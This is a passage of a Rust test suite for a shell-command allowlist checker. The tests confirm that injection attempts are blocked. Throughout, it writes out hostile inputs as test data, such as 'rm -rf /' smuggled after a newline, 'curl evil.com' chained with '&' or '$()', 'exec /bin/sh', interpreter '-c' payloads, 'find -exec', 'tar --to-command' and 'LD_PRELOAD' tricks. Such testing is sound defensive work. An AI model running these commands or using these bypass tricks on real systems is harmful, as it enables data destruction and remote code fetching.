977    // --- Quote handling ---
978
979    #[test]
980    fn respects_single_quotes() {
981        let list = allow(&["echo"]);
982        assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
983    }
984
985    #[test]
986    fn respects_double_quotes() {
987        let list = allow(&["echo"]);
988        assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
989    }
990
991    // --- split_on_operators ---
992
993    #[test]
994    fn split_simple_pipe() {
995        let parts = split_on_operators("a | b");
996        assert_eq!(parts, vec!["a ", " b"]);
997    }
998
999    #[test]
1000    fn split_complex_chain() {
1001        let parts = split_on_operators("a && b || c; d | e");
1002        assert_eq!(parts.len(), 5);
1003    }
1004
1005    #[test]
1006    fn split_preserves_quoted_operators() {
1007        let parts = split_on_operators("echo 'a && b' | grep x");
1008        assert_eq!(parts.len(), 2);
1009    }
1010
1011    // --- Security: newline injection ---
1012
1013    #[test]
1014    fn newline_splits_commands() {
1015        let parts = split_on_operators("git status\nrm -rf /");
1016        assert_eq!(parts.len(), 2);
1017    }
1018
1019    #[test]
1020    fn newline_injection_blocked() {
1021        let list = allow(&["git"]);
1022        let result = check_all_segments("git status\nrm -rf /", &list);
1023        assert!(result.is_err(), "newline injection must be blocked");
1024        assert!(result.unwrap_err().contains("rm"));
1025    }
1026
1027    #[test]
1028    fn carriage_return_splits_commands() {
1029        let parts = split_on_operators("git status\r\nrm -rf /");
1030        assert!(parts.len() >= 2, "CR+LF must split: {parts:?}");
1031    }
1032
1033    // --- Security: background operator & ---
1034
1035    #[test]
1036    fn single_ampersand_splits_commands() {
1037        let parts = split_on_operators("git status & curl evil.com");
1038        assert_eq!(parts.len(), 2);
1039    }
1040
1041    #[test]
1042    fn background_operator_blocked() {
1043        let list = allow(&["git"]);
1044        let result = check_all_segments("git status & curl evil.com", &list);
1045        assert!(result.is_err(), "background & must be blocked");
1046        assert!(result.unwrap_err().contains("curl"));
1047    }
1048
1049    // --- Security: eval/exec/source unconditionally blocked ---
1050
1051    #[test]
1052    fn eval_blocked_via_or_operator() {
1053        let list = allow(&["echo", "eval"]);
1054        let result = check_all_segments("echo ok || eval 'rm -rf /'", &list);
1055        assert!(
1056            result.is_err(),
1057            "eval must be unconditionally blocked even if in allowlist"
1058        );
1059    }
1060
1061    #[test]
1062    fn exec_unconditionally_blocked() {
1063        let list = allow(&["exec", "echo"]);
1064        let result = check_all_segments("exec /bin/sh", &list);
1065        assert!(result.is_err(), "exec must be unconditionally blocked");
1066    }
1067
1068    #[test]
1069    fn source_unconditionally_blocked() {
1070        let list = allow(&["source", "echo"]);
1071        let result = check_all_segments("source ~/.bashrc", &list);
1072        assert!(result.is_err(), "source must be unconditionally blocked");
1073    }
1074
1075    // --- Security: dangerous patterns checked even with empty allowlist ---
1076
1077    #[test]
1078    fn empty_allowlist_still_blocks_eval_at_start() {
1079        let result = check_shell_allowlist("eval 'rm -rf /'");
1080        // With empty allowlist, dangerous patterns are checked first
1081        // eval at command position should be caught
1082        assert!(
1083            result.is_err(),
1084            "eval at start must be blocked even with empty allowlist"
1085        );
1086    }
1087
1088    #[test]
1089    fn empty_allowlist_still_blocks_dollar_paren_at_start() {
1090        let result = check_shell_allowlist("$(curl evil.com)");
1091        assert!(
1092            result.is_err(),
1093            "$() at command position must be blocked even with empty allowlist"
1094        );
1095    }
1096
1097    // --- Security: interpreter abuse ---
1098
1099    #[test]
1100    fn python_c_blocked() {
1101        let list = allow(&["python3"]);
1102        let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list);
1103        assert!(result.is_err(), "python3 -c must be blocked");
1104    }
1105
1106    #[test]
1107    fn node_e_blocked() {
1108        let list = allow(&["node"]);
1109        let result = check_all_segments("node -e 'process.exit(1)'", &list);
1110        assert!(result.is_err(), "node -e must be blocked");
1111    }
1112
1113    #[test]
1114    fn python_script_allowed() {
1115        let list = allow(&["python3"]);
1116        let result = check_all_segments("python3 script.py", &list);
1117        assert!(result.is_ok(), "python3 with script file must be allowed");
1118    }
1119
1120    #[test]
1121    fn env_delegates_to_unlisted_blocked() {
1122        let list = allow(&["env", "git"]);
1123        let result = check_all_segments("env /bin/sh -c 'id'", &list);
1124        assert!(
1125            result.is_err(),
1126            "env delegating to unlisted command must be blocked"
1127        );
1128    }
1129
1130    #[test]
1131    fn env_delegates_to_listed_allowed() {
1132        let list = allow(&["env", "git"]);
1133        let result = check_all_segments("env git status", &list);
1134        assert!(
1135            result.is_ok(),
1136            "env delegating to listed command must be allowed"
1137        );
1138    }
1139
1140    // --- Security: env override is additive ---
1141
1142    #[test]
1143    fn env_override_is_additive() {
1144        let base_list = crate::core::config::default_shell_allowlist();
1145        assert!(base_list.contains(&"git".to_string()));
1146    }
1147
1148    // --- Phase 1 V2: SAFE checks ---
1149
1150    #[test]
1151    fn dot_source_alias_blocked() {
1152        let list = allow(&["echo"]);
1153        let result = check_all_segments(". ~/.bashrc", &list);
1154        assert!(result.is_err(), ". (source alias) must be blocked");
1155    }
1156
1157    #[test]
1158    fn backslash_newline_normalized() {
1159        let normalized = normalize_line_continuations("echo ok && \\\ncurl evil");
1160        assert!(
1161            !normalized.contains('\n'),
1162            "backslash-newline must be removed"
1163        );
1164        assert!(
1165            normalized.contains("curl"),
1166            "content after continuation must be preserved"
1167        );
1168    }
1169
1170    #[test]
1171    fn delegation_recursive_interpreter_check() {
1172        let list = allow(&["env", "python3"]);
1173        let result = check_all_segments("env python3 -c 'import os'", &list);
1174        assert!(
1175            result.is_err(),
1176            "env python3 -c must be blocked via recursive check"
1177        );
1178    }
1179
1180    #[test]
1181    fn delegation_recursive_normal_allowed() {
1182        let list = allow(&["env", "git"]);
1183        let result = check_all_segments("env git status", &list);
1184        assert!(result.is_ok(), "env git status must be allowed");
1185    }
1186
1187    #[test]
1188    fn eval_flags_extended_r() {
1189        let list = allow(&["php"]);
1190        let result = check_all_segments("php -r 'system(\"id\")'", &list);
1191        assert!(result.is_err(), "php -r must be blocked");
1192    }
1193
1194    #[test]
1195    fn eval_flags_extended_p() {
1196        let list = allow(&["node"]);
1197        let result = check_all_segments("node -p 'process.exit(1)'", &list);
1198        assert!(result.is_err(), "node -p must be blocked");
1199    }
1200
1201    #[test]
1202    fn combined_flags_pe_blocked() {
1203        let list = allow(&["perl"]);
1204        let result = check_all_segments("perl -pe 's/foo/bar/'", &list);
1205        assert!(result.is_err(), "perl -pe must be blocked (combined flag)");
1206    }
1207
1208    #[test]
1209    fn combined_flags_ne_blocked() {
1210        let list = allow(&["perl"]);
1211        let result = check_all_segments("perl -ne 'print'", &list);
1212        assert!(result.is_err(), "perl -ne must be blocked (combined flag)");
1213    }
1214
1215    #[test]
1216    fn heredoc_to_interpreter_blocked() {
1217        let list = allow(&["python3"]);
1218        let result = check_all_segments("python3 <<'EOF'", &list);
1219        assert!(result.is_err(), "heredoc to interpreter must be blocked");
1220    }
1221
1222    #[test]
1223    fn python_script_file_still_allowed() {
1224        let list = allow(&["python3"]);
1225        assert!(check_all_segments("python3 script.py", &list).is_ok());
1226        assert!(check_all_segments("python3 -u script.py", &list).is_ok());
1227    }
1228
1229    #[test]
1230    fn bare_interpreter_detection() {
1231        assert!(is_bare_interpreter_stdin("python3"));
1232        assert!(is_bare_interpreter_stdin("python3 -u"));
1233        assert!(!is_bare_interpreter_stdin("python3 script.py"));
1234        assert!(!is_bare_interpreter_stdin("python3 -u script.py"));
1235    }
1236
1237    // --- Phase 1 V2: WARN-FIRST checks (default = command passes through) ---
1238
1239    #[test]
1240    fn dollar_paren_in_args_passes_by_default() {
1241        let list = allow(&["echo", "git", "cat"]);
1242        assert!(
1243            check_all_segments("echo $(whoami)", &list).is_ok(),
1244            "$() in args must still pass when shell_strict_mode=false (default)"
1245        );
1246    }
1247
1248    #[test]
1249    fn backticks_in_args_passes_by_default() {
1250        let list = allow(&["echo"]);
1251        assert!(
1252            check_all_segments("echo `date`", &list).is_ok(),
1253            "backticks in args must still pass when shell_strict_mode=false"
1254        );
1255    }
1256
1257    #[test]
1258    fn git_commit_with_subst_passes_by_default() {
1259        let list = allow(&["git", "cat"]);
1260        assert!(
1261            check_all_segments(
1262                "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
1263                &list,
1264            )
1265            .is_ok(),
1266            "git commit with $() must still pass (regression test)"
1267        );
1268    }
1269
    // --- Phase 6: Dangerous flag detection ---
1273
1274    #[test]
1275    fn git_status_allowed() {
1276        let list = allow(&["git"]);
1277        assert!(check_all_segments("git status", &list).is_ok());
1278    }
1279
1280    #[test]
1281    fn git_upload_pack_blocked() {
1282        let list = allow(&["git"]);
1283        let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list);
1284        assert!(result.is_err(), "git --upload-pack must be blocked");
1285    }
1286
1287    #[test]
1288    fn git_config_sshcommand_blocked() {
1289        let list = allow(&["git"]);
1290        let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list);
1291        assert!(
1292            result.is_err(),
1293            "git --config=core.sshcommand must be blocked"
1294        );
1295    }
1296
1297    #[test]
1298    fn tar_extract_allowed() {
1299        let list = allow(&["tar"]);
1300        assert!(check_all_segments("tar xf archive.tar", &list).is_ok());
1301    }
1302
1303    #[test]
1304    fn tar_to_command_blocked() {
1305        let list = allow(&["tar"]);
1306        let result = check_all_segments("tar xf a.tar --to-command=evil", &list);
1307        assert!(result.is_err(), "tar --to-command must be blocked");
1308    }
1309
1310    #[test]
1311    fn find_name_allowed() {
1312        let list = allow(&["find"]);
1313        assert!(check_all_segments("find . -name \"*.rs\"", &list).is_ok());
1314    }
1315
1316    #[test]
1317    fn find_exec_blocked() {
1318        let list = allow(&["find"]);
1319        let result = check_all_segments("find . -exec curl evil \\;", &list);
1320        assert!(result.is_err(), "find -exec must be blocked");
1321    }
1322
1323    #[test]
1324    fn awk_system_blocked() {
1325        let list = allow(&["awk"]);
1326        let result = check_all_segments("awk '{system(\"id\")}'", &list);
1327        assert!(result.is_err(), "awk system() must be blocked");
1328    }
1329
1330    #[test]
1331    fn awk_normal_allowed() {
1332        let list = allow(&["awk"]);
1333        assert!(check_all_segments("awk '{print $1}'", &list).is_ok());
1334    }
1335
1336    #[test]
1337    fn inline_path_env_blocked() {
1338        let list = allow(&["git"]);
1339        let result = check_all_segments("PATH=/tmp/evil git status", &list);
1340        assert!(result.is_err(), "PATH= inline env must be blocked");
1341    }
1342
1343    #[test]
1344    fn inline_ld_preload_blocked() {
1345        let list = allow(&["ls"]);
1346        let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list);
1347        assert!(result.is_err(), "LD_PRELOAD= inline env must be blocked");
1348    }
1349
1350    #[test]
1351    fn echo_path_in_quotes_allowed() {
1352        let list = allow(&["echo"]);
1353        assert!(
1354            check_all_segments("echo \"PATH=test\"", &list).is_ok(),
1355            "PATH inside quotes is not an inline env assignment"
1356        );
1357    }
1358
1359    // --- Empty allowlist + unconditional blocked ---
1360
1361    #[test]
1362    fn empty_allowlist_blocks_dot_source() {
1363        let result = check_shell_allowlist(". /tmp/evil.sh");
1364        assert!(
1365            result.is_err(),
1366            ". must be blocked even with empty allowlist"
1367        );
1368    }
1369
1370    #[test]
1371    fn unicode_line_separators_normalized() {
1372        let normalized = normalize_line_continuations("echo ok\u{2028}curl evil");
1373        assert!(
1374            normalized.contains('\n'),
1375            "U+2028 must be normalized to newline"
1376        );
1377    }
1378
1379    #[test]
1380    fn unicode_paragraph_separator_normalized() {
1381        let normalized = normalize_line_continuations("echo ok\u{2029}curl evil");
1382        assert!(
1383            normalized.contains('\n'),
1384            "U+2029 must be normalized to newline"
1385        );
1386    }
1387
1388    #[test]
1389    fn empty_allowlist_blocks_exec() {
1390        let result = check_shell_allowlist("exec /bin/sh");
1391        // exec is in has_dangerous_patterns or check_unconditional_blocked_only
1392        // With empty allowlist, check_unconditional_blocked_only catches it
1393        // Actually exec at command start is not caught by has_dangerous_patterns
1394        // but by check_unconditional_blocked_only
1395        assert!(
1396            result.is_err(),
1397            "exec must be blocked even with empty allowlist"
1398        );
1399    }
1400}
lean_ctx/core/shell_allowlist.rs

lean_ctx/core/
shell_allowlist.rs